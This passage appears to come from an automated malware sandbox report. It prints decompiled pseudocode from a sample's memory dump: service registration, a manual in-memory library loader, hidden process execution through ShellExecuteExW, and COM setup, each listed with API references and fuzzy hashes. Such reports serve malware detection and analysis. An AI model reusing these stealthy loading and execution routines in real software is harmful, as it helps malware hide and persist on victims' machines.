				 *0x7098f4f4 = 0x85;
				 *0x7098f4f8 = 0;
				 *0x7098f4fc = 0;
				 *0x7098f500 = 0;
				 *0x7098f504 = 0;
				__imp__RegisterServiceCtrlHandlerExW( *_t27, E70983BC0, 0, _t23, _t26);
				 *0x7098f3c4 = _t10;
				if(_t10 == 0) {
					 *0x7098f4f0 = 1;
					SetServiceStatus(0, 0x7098f4ec);
					ExitProcess(0);
				}
				_t21 = _v8;
				 *0x7098f4f0 = 4;
				_t30 = _t21 - 1;
				if(_t30 <= 0) {
					L7:
					_t13 = HeapAlloc(GetProcessHeap(), 8, 4);
					if(_t13 != 0) {
						_t22 =  *0x7098f598; // 0x1
						 *_t13 = _t22;
						CloseHandle(CreateThread(0, 0, E70983A80, _t13, 0, 0));
					}
					L9:
					_v4 = 0x7098f4ec;
					_t14 =  *0x7098f3c4; // 0x0
					_v8 = _t14;
					return SetServiceStatus(??, ??);
				}
				_t18 = 1;
				if(_t30 <= 0) {
					goto L7;
				} else {
					while(1) {
						_t20 =  *((intOrPtr*)(_t27 + _t18 * 4));
						if( *_t20 == 0x73 &&  *((intOrPtr*)(_t20 + 2)) == 0) {
							goto L9;
						}
						_t18 = _t18 + 1;
						if(_t18 < _t21) {
							continue;
						}
						goto L7;
					}
					goto L9;
				}
			}

















                                                                                                        0x70983cb0
                                                                                                        0x70983cb8
                                                                                                        0x70983cbe
                                                                                                        0x70983cc5
                                                                                                        0x70983ccf
                                                                                                        0x70983cd9
                                                                                                        0x70983ce3
                                                                                                        0x70983ce9
                                                                                                        0x70983cef
                                                                                                        0x70983cf5
                                                                                                        0x70983d03
                                                                                                        0x70983d09
                                                                                                        0x70983d10
                                                                                                        0x70983d97
                                                                                                        0x70983da1
                                                                                                        0x70983da8
                                                                                                        0x70983da8
                                                                                                        0x70983d12
                                                                                                        0x70983d16
                                                                                                        0x70983d20
                                                                                                        0x70983d23
                                                                                                        0x70983d44
                                                                                                        0x70983d4f
                                                                                                        0x70983d57
                                                                                                        0x70983d59
                                                                                                        0x70983d69
                                                                                                        0x70983d72
                                                                                                        0x70983d72
                                                                                                        0x70983d78
                                                                                                        0x70983d7a
                                                                                                        0x70983d82
                                                                                                        0x70983d87
                                                                                                        0x70983d8b
                                                                                                        0x70983d8b
                                                                                                        0x70983d25
                                                                                                        0x70983d28
                                                                                                        0x00000000
                                                                                                        0x70983d30
                                                                                                        0x70983d30
                                                                                                        0x70983d30
                                                                                                        0x70983d37
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983d3f
                                                                                                        0x70983d42
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983d42
                                                                                                        0x00000000
                                                                                                        0x70983d30

                                                                                                        APIs
                                                                                                        • SetCurrentDirectoryW.KERNEL32(00B757B8), ref: 70983CB8
                                                                                                        • RegisterServiceCtrlHandlerExW.ADVAPI32(?,70983BC0,00000000), ref: 70983D03
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,?,70983BC0,00000000), ref: 70983D48
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,70983BC0,00000000), ref: 70983D4F
                                                                                                        • CreateThread.KERNEL32 ref: 70983D6B
                                                                                                        • CloseHandle.KERNEL32(00000000,?,70983BC0,00000000), ref: 70983D72
                                                                                                        • SetServiceStatus.ADVAPI32(00000000,7098F4EC,?,70983BC0,00000000), ref: 70983DA1
                                                                                                        • ExitProcess.KERNEL32 ref: 70983DA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcessService$AllocCloseCreateCtrlCurrentDirectoryExitHandleHandlerRegisterStatusThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2085172483-0
                                                                                                        • Opcode ID: 4303ca504aa8bdcbcbe9850aa6e300b1ee01a403f56256e620dd19387c1f8d42
                                                                                                        • Instruction ID: a9d2f05a6b14acc3e483df01efba6a5d1d876813d7682430fdb3ea82a5849700
                                                                                                        • Opcode Fuzzy Hash: 4303ca504aa8bdcbcbe9850aa6e300b1ee01a403f56256e620dd19387c1f8d42
                                                                                                        • Instruction Fuzzy Hash: 822127B2528201AFC3108F66CCACB1ABBB9FBE5704F30952AE556C73E1E7719444EB11
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709817B0, Relevance: 10.6, APIs: 7, Instructions: 138memorylibraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709817B0(void* __edi) {
				struct HINSTANCE__* _v4;
				intOrPtr* _v8;
				intOrPtr _t40;
				intOrPtr _t42;
				struct HINSTANCE__* _t44;
				signed int _t46;
				intOrPtr _t47;
				signed short _t48;
				CHAR* _t49;
				_Unknown_base(*)()* _t51;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				void* _t60;
				intOrPtr* _t67;
				signed short* _t70;
				intOrPtr _t75;
				intOrPtr* _t78;
				void* _t83;
				signed short* _t88;
				void* _t94;
				signed short _t114;

				_t83 = __edi;
				_t40 =  *((intOrPtr*)(__edi + 0xc0));
				if(_t40 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
					return 0;
				} else {
					_t67 =  *((intOrPtr*)(__edi + 0x144)) + _t40;
					_t42 =  *((intOrPtr*)(_t67 + 0xc));
					_v8 = _t67;
					if(_t42 == 0) {
						L30:
						return 0;
					} else {
						_t94 = _v4;
						while(1) {
							_t44 = LoadLibraryA( *((intOrPtr*)(_t83 + 0x144)) + _t42);
							_v4 = _t44;
							if(_t44 == 0) {
								break;
							}
							_t46 =  *(_t83 + 0x154);
							if( *(_t83 + 0x150) < _t46) {
								L16:
								if(_t94 != 0) {
									_t53 =  *(_t83 + 0x150);
									_t54 = _t53 + 1;
									 *(_t83 + 0x150) = _t54;
									if( *((intOrPtr*)(_t94 + _t53 * 4)) != 0) {
										 *((intOrPtr*)(_t94 + _t54 * 4)) = _v4;
										 *(_t83 + 0x150) =  *(_t83 + 0x150) + 1;
									}
								}
								_t47 =  *((intOrPtr*)(_t83 + 0x144));
								_t78 = _v8;
								_t88 =  *((intOrPtr*)(_t67 + 0x10)) + _t47;
								_t70 = _t88;
								if( *((intOrPtr*)(_t78 + 4)) == 0) {
									L22:
									_t48 =  *_t70;
									_t114 = _t48;
									if(_t114 == 0) {
										L29:
										_t42 =  *((intOrPtr*)(_t78 + 0x20));
										_v8 = _t78 + 0x14;
										if(_t42 != 0) {
											_t67 = _v8;
											continue;
										} else {
											goto L30;
										}
									} else {
										L23:
										L23:
										if(_t114 >= 0) {
											_t49 = _t48 +  *((intOrPtr*)(_t83 + 0x144)) + 2;
										} else {
											_t49 = _t48 & 0x0000ffff;
										}
										_t51 = GetProcAddress(_v4, _t49);
										 *_t88 = _t51;
										if(_t51 == 0) {
											break;
										}
										_t48 = _t70[2];
										_t70 =  &(_t70[2]);
										_t88 =  &(_t88[2]);
										if(_t48 != 0) {
											goto L23;
										} else {
											_t78 = _v8;
											goto L29;
										}
									}
								} else {
									_t75 =  *_t78;
									if(_t75 == 0) {
										return 8;
									} else {
										_t70 = _t75 + _t47;
										goto L22;
									}
								}
							} else {
								if(_t46 == 0) {
									_t55 = 0x10;
								} else {
									_t55 = _t46 + _t46;
								}
								 *(_t83 + 0x154) = _t55;
								_t94 = HeapAlloc(GetProcessHeap(), 8, _t55 * 4);
								if(_t94 == 0) {
									return 3;
								} else {
									_t59 =  *(_t83 + 0x150);
									if(_t59 != 0) {
										RtlMoveMemory(_t94,  *(_t83 + 0x14c), _t59 + _t59 + _t59 + _t59);
									}
									_t60 =  *(_t83 + 0x14c);
									if(_t60 != 0) {
										HeapFree(GetProcessHeap(), 0, _t60);
									}
									 *(_t83 + 0x14c) = _t94;
									goto L16;
								}
							}
							goto L35;
						}
						return 6;
					}
				}
				L35:
			}


























                                                                                                        0x709817b0
                                                                                                        0x709817b0
                                                                                                        0x709817bb
                                                                                                        0x70981950
                                                                                                        0x709817ce
                                                                                                        0x709817d5
                                                                                                        0x709817d7
                                                                                                        0x709817dc
                                                                                                        0x709817e2
                                                                                                        0x7098191e
                                                                                                        0x70981926
                                                                                                        0x709817e8
                                                                                                        0x709817e8
                                                                                                        0x709817f4
                                                                                                        0x709817fd
                                                                                                        0x70981803
                                                                                                        0x70981809
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098180f
                                                                                                        0x7098181b
                                                                                                        0x7098188b
                                                                                                        0x7098188d
                                                                                                        0x7098188f
                                                                                                        0x70981899
                                                                                                        0x7098189a
                                                                                                        0x709818a2
                                                                                                        0x709818a8
                                                                                                        0x709818ac
                                                                                                        0x709818ac
                                                                                                        0x709818a2
                                                                                                        0x709818b5
                                                                                                        0x709818bb
                                                                                                        0x709818bf
                                                                                                        0x709818c5
                                                                                                        0x709818c7
                                                                                                        0x709818d2
                                                                                                        0x709818d2
                                                                                                        0x709818d4
                                                                                                        0x709818d6
                                                                                                        0x7098190c
                                                                                                        0x7098190c
                                                                                                        0x70981912
                                                                                                        0x70981918
                                                                                                        0x709817f0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709818d8
                                                                                                        0x00000000
                                                                                                        0x709818d8
                                                                                                        0x709818d8
                                                                                                        0x709818e5
                                                                                                        0x709818da
                                                                                                        0x709818da
                                                                                                        0x709818da
                                                                                                        0x709818ef
                                                                                                        0x709818f5
                                                                                                        0x709818f9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709818fb
                                                                                                        0x709818fe
                                                                                                        0x70981901
                                                                                                        0x70981906
                                                                                                        0x00000000
                                                                                                        0x70981908
                                                                                                        0x70981908
                                                                                                        0x00000000
                                                                                                        0x70981908
                                                                                                        0x70981906
                                                                                                        0x709818c9
                                                                                                        0x709818c9
                                                                                                        0x709818cd
                                                                                                        0x7098193e
                                                                                                        0x709818cf
                                                                                                        0x709818cf
                                                                                                        0x00000000
                                                                                                        0x709818cf
                                                                                                        0x709818cd
                                                                                                        0x7098181d
                                                                                                        0x7098181f
                                                                                                        0x70981825
                                                                                                        0x70981821
                                                                                                        0x70981821
                                                                                                        0x70981821
                                                                                                        0x7098183a
                                                                                                        0x70981849
                                                                                                        0x7098184d
                                                                                                        0x70981932
                                                                                                        0x70981853
                                                                                                        0x70981853
                                                                                                        0x7098185b
                                                                                                        0x7098186a
                                                                                                        0x7098186a
                                                                                                        0x7098186f
                                                                                                        0x70981877
                                                                                                        0x7098187f
                                                                                                        0x7098187f
                                                                                                        0x70981885
                                                                                                        0x00000000
                                                                                                        0x70981885
                                                                                                        0x7098184d
                                                                                                        0x00000000
                                                                                                        0x7098181b
                                                                                                        0x7098194a
                                                                                                        0x7098194a
                                                                                                        0x709817e2
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 709817FD
                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 70981840
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70981843
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 7098186A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 7098187C
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098187F
                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 709818EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2239585089-0
                                                                                                        • Opcode ID: 83aaa6b9efdcff029ce667accdbea47dbc1d9023ffd3e1f4c083ac3c3b109736
                                                                                                        • Instruction ID: 95db81e27f51f4f234ce82197dea85ae28d1b9d11ca97e36316960cd62a80ed4
                                                                                                        • Opcode Fuzzy Hash: 83aaa6b9efdcff029ce667accdbea47dbc1d9023ffd3e1f4c083ac3c3b109736
                                                                                                        • Instruction Fuzzy Hash: E6416C71704706DBD7048F69E88479AB3ADFB44315F444529E81AC7380E739E814CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709817EE, Relevance: 10.6, APIs: 7, Instructions: 98memorylibraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709817EE(intOrPtr __eax, void* __edi, intOrPtr* _a12, struct HINSTANCE__* _a16) {
				intOrPtr _t34;
				struct HINSTANCE__* _t35;
				signed int _t37;
				intOrPtr _t38;
				signed short _t39;
				CHAR* _t41;
				_Unknown_base(*)()* _t43;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t51;
				void* _t52;
				intOrPtr* _t57;
				signed short* _t59;
				intOrPtr _t65;
				intOrPtr* _t68;
				void* _t73;
				signed short* _t76;
				void* _t81;
				signed short _t103;

				_t73 = __edi;
				_t34 = __eax;
				while(1) {
					_t57 = _a12;
					_t35 = LoadLibraryA( *((intOrPtr*)(_t73 + 0x144)) + _t34);
					_a16 = _t35;
					if(_t35 == 0) {
						break;
					}
					_t37 =  *(_t73 + 0x154);
					if( *(_t73 + 0x150) < _t37) {
						L13:
						if(_t81 != 0) {
							_t45 =  *(_t73 + 0x150);
							_t46 = _t45 + 1;
							 *(_t73 + 0x150) = _t46;
							if( *((intOrPtr*)(_t81 + _t45 * 4)) != 0) {
								 *((intOrPtr*)(_t81 + _t46 * 4)) = _a16;
								 *(_t73 + 0x150) =  *(_t73 + 0x150) + 1;
							}
						}
						_t38 =  *((intOrPtr*)(_t73 + 0x144));
						_t68 = _a12;
						_t76 =  *((intOrPtr*)(_t57 + 0x10)) + _t38;
						_t59 = _t76;
						if( *((intOrPtr*)(_t68 + 4)) == 0) {
							L19:
							_t39 =  *_t59;
							_t103 = _t39;
							if(_t103 == 0) {
								L26:
								_t34 =  *((intOrPtr*)(_t68 + 0x20));
								_a12 = _t68 + 0x14;
								if(_t34 != 0) {
									continue;
								} else {
									return 0;
								}
							} else {
								L20:
								L20:
								if(_t103 >= 0) {
									_t41 = _t39 +  *((intOrPtr*)(_t73 + 0x144)) + 2;
								} else {
									_t41 = _t39 & 0x0000ffff;
								}
								_t43 = GetProcAddress(_a16, _t41);
								 *_t76 = _t43;
								if(_t43 == 0) {
									break;
								}
								_t39 = _t59[2];
								_t59 =  &(_t59[2]);
								_t76 =  &(_t76[2]);
								if(_t39 != 0) {
									goto L20;
								} else {
									_t68 = _a12;
									goto L26;
								}
							}
						} else {
							_t65 =  *_t68;
							if(_t65 == 0) {
								return 8;
							} else {
								_t59 = _t65 + _t38;
								goto L19;
							}
						}
					} else {
						if(_t37 == 0) {
							_t47 = 0x10;
						} else {
							_t47 = _t37 + _t37;
						}
						 *(_t73 + 0x154) = _t47;
						_t81 = HeapAlloc(GetProcessHeap(), 8, _t47 * 4);
						if(_t81 == 0) {
							return 3;
						} else {
							_t51 =  *(_t73 + 0x150);
							if(_t51 != 0) {
								RtlMoveMemory(_t81,  *(_t73 + 0x14c), _t51 + _t51 + _t51 + _t51);
							}
							_t52 =  *(_t73 + 0x14c);
							if(_t52 != 0) {
								HeapFree(GetProcessHeap(), 0, _t52);
							}
							 *(_t73 + 0x14c) = _t81;
							goto L13;
						}
					}
					L31:
				}
				return 6;
				goto L31;
			}























                                                                                                        0x709817ee
                                                                                                        0x709817ee
                                                                                                        0x709817f0
                                                                                                        0x709817f0
                                                                                                        0x709817fd
                                                                                                        0x70981803
                                                                                                        0x70981809
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098180f
                                                                                                        0x7098181b
                                                                                                        0x7098188b
                                                                                                        0x7098188d
                                                                                                        0x7098188f
                                                                                                        0x70981899
                                                                                                        0x7098189a
                                                                                                        0x709818a2
                                                                                                        0x709818a8
                                                                                                        0x709818ac
                                                                                                        0x709818ac
                                                                                                        0x709818a2
                                                                                                        0x709818b5
                                                                                                        0x709818bb
                                                                                                        0x709818bf
                                                                                                        0x709818c5
                                                                                                        0x709818c7
                                                                                                        0x709818d2
                                                                                                        0x709818d2
                                                                                                        0x709818d4
                                                                                                        0x709818d6
                                                                                                        0x7098190c
                                                                                                        0x7098190c
                                                                                                        0x70981912
                                                                                                        0x70981918
                                                                                                        0x00000000
                                                                                                        0x7098191e
                                                                                                        0x70981926
                                                                                                        0x70981926
                                                                                                        0x709818d8
                                                                                                        0x00000000
                                                                                                        0x709818d8
                                                                                                        0x709818d8
                                                                                                        0x709818e5
                                                                                                        0x709818da
                                                                                                        0x709818da
                                                                                                        0x709818da
                                                                                                        0x709818ef
                                                                                                        0x709818f5
                                                                                                        0x709818f9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709818fb
                                                                                                        0x709818fe
                                                                                                        0x70981901
                                                                                                        0x70981906
                                                                                                        0x00000000
                                                                                                        0x70981908
                                                                                                        0x70981908
                                                                                                        0x00000000
                                                                                                        0x70981908
                                                                                                        0x70981906
                                                                                                        0x709818c9
                                                                                                        0x709818c9
                                                                                                        0x709818cd
                                                                                                        0x7098193e
                                                                                                        0x709818cf
                                                                                                        0x709818cf
                                                                                                        0x00000000
                                                                                                        0x709818cf
                                                                                                        0x709818cd
                                                                                                        0x7098181d
                                                                                                        0x7098181f
                                                                                                        0x70981825
                                                                                                        0x70981821
                                                                                                        0x70981821
                                                                                                        0x70981821
                                                                                                        0x7098183a
                                                                                                        0x70981849
                                                                                                        0x7098184d
                                                                                                        0x70981932
                                                                                                        0x70981853
                                                                                                        0x70981853
                                                                                                        0x7098185b
                                                                                                        0x7098186a
                                                                                                        0x7098186a
                                                                                                        0x7098186f
                                                                                                        0x70981877
                                                                                                        0x7098187f
                                                                                                        0x7098187f
                                                                                                        0x70981885
                                                                                                        0x00000000
                                                                                                        0x70981885
                                                                                                        0x7098184d
                                                                                                        0x00000000
                                                                                                        0x7098181b
                                                                                                        0x7098194a
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 709817FD
                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 70981840
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70981843
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 7098186A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 7098187C
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098187F
                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 709818EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2239585089-0
                                                                                                        • Opcode ID: d11581166198095076423030efe4f29530a226d2f8aa8c5893cb8fd056899c9c
                                                                                                        • Instruction ID: 09845eb83bcdb93a99aa87419af566fb89927a3a6eab71b4650e465a154ed3e0
                                                                                                        • Opcode Fuzzy Hash: d11581166198095076423030efe4f29530a226d2f8aa8c5893cb8fd056899c9c
                                                                                                        • Instruction Fuzzy Hash: A53139B5604706EFD7058F69D8457AAB7BDBB84305F00852DE85ACB381E735E8108B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709844E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E709844E0(intOrPtr _a4, intOrPtr _a8, DWORD* _a12) {
				intOrPtr _v0;
				intOrPtr _v4;
				struct _SHELLEXECUTEINFOW _v68;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				int _t25;
				DWORD* _t27;
				int _t35;
				signed int _t38;
				long _t40;

				_push(0x3c);
				_push( &(_v68.hwnd));
				L7098BF02();
				_t22 = _v0;
				_v68.cbSize = 0x3c;
				_v68.fMask = 0x800400;
				_v68.nShow = 0;
				if(_t22 != 0) {
					_v68.lpFile = _t22;
				}
				_t23 = _a4;
				if(_t23 != 0) {
					_v68.lpParameters = _t23;
				}
				_t24 = _v4;
				if(_t24 != 0) {
					_v68.lpVerb = _t24;
				}
				if(_a8 == 0) {
					_v68.fMask = 0x808400;
				} else {
					_v68.nShow = 1;
				}
				_t38 = _a12;
				if(_t38 != 0) {
					_v68.fMask = _v68.fMask | 0x00000040;
				}
				_t25 = ShellExecuteExW( &_v68);
				_t35 = _t25;
				if(_t35 != 0 && _t38 != 0) {
					if(_t38 == 0xffffffff) {
						_t40 = _t38 | 0xffffffff;
					} else {
						_t40 = _t38 * 0x3e8;
					}
					WaitForSingleObject(_v68.hIcon, _t40);
					_t27 = _a12;
					if(_t27 != 0) {
						GetExitCodeProcess(_v68.hIcon, _t27);
					}
					CloseHandle(_v68.hIcon);
					_t25 = _t35;
				}
				return _t25;
			}














                                                                                                        0x709844e3
                                                                                                        0x709844e9
                                                                                                        0x709844ea
                                                                                                        0x709844ef
                                                                                                        0x709844f3
                                                                                                        0x709844fa
                                                                                                        0x70984502
                                                                                                        0x7098450c
                                                                                                        0x7098450e
                                                                                                        0x7098450e
                                                                                                        0x70984512
                                                                                                        0x70984518
                                                                                                        0x7098451a
                                                                                                        0x7098451a
                                                                                                        0x7098451e
                                                                                                        0x70984524
                                                                                                        0x70984526
                                                                                                        0x70984526
                                                                                                        0x7098452f
                                                                                                        0x7098453b
                                                                                                        0x70984531
                                                                                                        0x70984531
                                                                                                        0x70984531
                                                                                                        0x70984544
                                                                                                        0x7098454b
                                                                                                        0x7098454d
                                                                                                        0x7098454d
                                                                                                        0x70984557
                                                                                                        0x7098455d
                                                                                                        0x70984561
                                                                                                        0x7098456a
                                                                                                        0x70984574
                                                                                                        0x7098456c
                                                                                                        0x7098456c
                                                                                                        0x7098456c
                                                                                                        0x7098457d
                                                                                                        0x70984583
                                                                                                        0x70984589
                                                                                                        0x70984591
                                                                                                        0x70984591
                                                                                                        0x7098459c
                                                                                                        0x709845a2
                                                                                                        0x709845a2
                                                                                                        0x709845a9

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 709844EA
                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 70984557
                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 7098457D
                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 70984591
                                                                                                        • CloseHandle.KERNEL32(?), ref: 7098459C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseCodeExecuteExitHandleMemoryObjectProcessShellSingleWaitZero
                                                                                                        • String ID: @
                                                                                                        • API String ID: 1639083440-2766056989
                                                                                                        • Opcode ID: b73dea844fd5b5db9d1c71794693fb2b6673d01ecb686d070129b54b73d9ce2b
                                                                                                        • Instruction ID: 4f311a31759ec97e8795c623465bf21dc738923525502b805f8690948192a266
                                                                                                        • Opcode Fuzzy Hash: b73dea844fd5b5db9d1c71794693fb2b6673d01ecb686d070129b54b73d9ce2b
                                                                                                        • Instruction Fuzzy Hash: 672103B25083109FD3008B69C944B1EBBF8AF85B10F008A2DBA96973D0D7B4D9058B93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70986910, Relevance: 9.2, APIs: 6, Instructions: 208comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 32%
                                                                                                        			E70986910() {
				intOrPtr* _v24;
				intOrPtr _v40;
				void* _v104;
				void* _v112;
				intOrPtr* _v124;
				char _v128;
				intOrPtr _v132;
				WCHAR* _v136;
				intOrPtr* _v140;
				intOrPtr* _v144;
				char _v152;
				intOrPtr* _v160;
				void* _v164;
				intOrPtr _v168;
				intOrPtr* _v180;
				void* _v184;
				intOrPtr* _v192;
				char _v196;
				short _v200;
				char _v204;
				intOrPtr* _v212;
				intOrPtr _v228;
				intOrPtr* _v240;
				intOrPtr* _v248;
				intOrPtr* _v260;
				intOrPtr* _v268;
				intOrPtr* _v280;
				char* _t66;
				intOrPtr* _t68;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr* _t86;
				intOrPtr* _t89;
				intOrPtr* _t91;
				WCHAR* _t94;
				intOrPtr* _t96;
				intOrPtr* _t99;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t109;
				intOrPtr* _t112;
				intOrPtr* _t115;
				intOrPtr* _t117;
				WCHAR* _t165;

				_t165 = 0;
				__imp__CoInitializeEx(0, 0);
				_t66 =  &_v104;
				_v104 = 0;
				__imp__CoCreateInstance(0x7098cf4c, 0, 1, 0x7098d16c, _t66);
				if(_t66 < 0) {
					L19:
					__imp__CoUninitialize();
					return _t165;
				}
				_t68 = _v124;
				_push( &_v112);
				_push(2);
				_push(0);
				_v112 = 0;
				_push( *_v24);
				_push(_t68);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x54))))() < 0) {
					L18:
					_t71 = _v144;
					 *((intOrPtr*)( *((intOrPtr*)( *_t71 + 8))))(_t71);
					goto L19;
				}
				_t73 = _v144;
				_v136 = 0;
				_push( &_v136);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x38))))() < 0) {
					L17:
					_t76 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
					goto L18;
				}
				_t78 = _v144;
				_push(_v40);
				_push(_t78);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x38))))() < 0) {
					L16:
					_t81 = _v152;
					 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 8))))(_t81);
					goto L17;
				}
				asm("movq xmm0, [0x7098cf5c]");
				_t83 = _v160;
				_push( &_v164);
				asm("movq [esp+0x30], xmm0");
				asm("movq xmm0, [0x7098cf64]");
				_push( &_v128);
				_v164 = 0;
				asm("movq [esp+0x3c], xmm0");
				_push(0x7098cf6c);
				_push(_t83);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x20))))() < 0) {
					goto L16;
				}
				_t86 = _v180;
				_push(2);
				_push(_v168);
				_push(_t86);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))() < 0) {
					L15:
					_t89 = _v192;
					 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
					goto L16;
				}
				_t91 = _v192;
				_push( &_v184);
				_v196 = 0;
				_v184 = 0;
				_push( &_v196);
				_push(_t91);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x28))))() >= 0) {
					L7098BF02();
					_t94 = StrChrW(0x7098cdb0, 0x49);
					_v136 = _t94;
					__imp__#8( &_v196,  &_v136, 0x20);
					asm("movss xmm0, [0x7098cdac]");
					_v200 = 4;
					_t96 = _v212;
					asm("movss [esp+0x2c], xmm0");
					 *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x10))))(_t96, 1,  &_v152,  &_v200);
					_t99 = _v240;
					_push(_v228);
					_push(_t99);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0xc))))() >= 0) {
						asm("movq xmm0, [0x7098cf7c]");
						_t106 = _v248;
						_push(_v132);
						asm("movq [esp+0x40], xmm0");
						asm("movq xmm0, [0x7098cf84]");
						asm("movq [esp+0x48], xmm0");
						_push(_v136);
						_push(_t106);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x10))))() >= 0) {
							_t109 = _v260;
							_push( &_v204);
							_push(_t109);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t109 + 0x18))))() >= 0) {
								_t112 = _v268;
								_push(0);
								_push(_v248);
								_push(_t112);
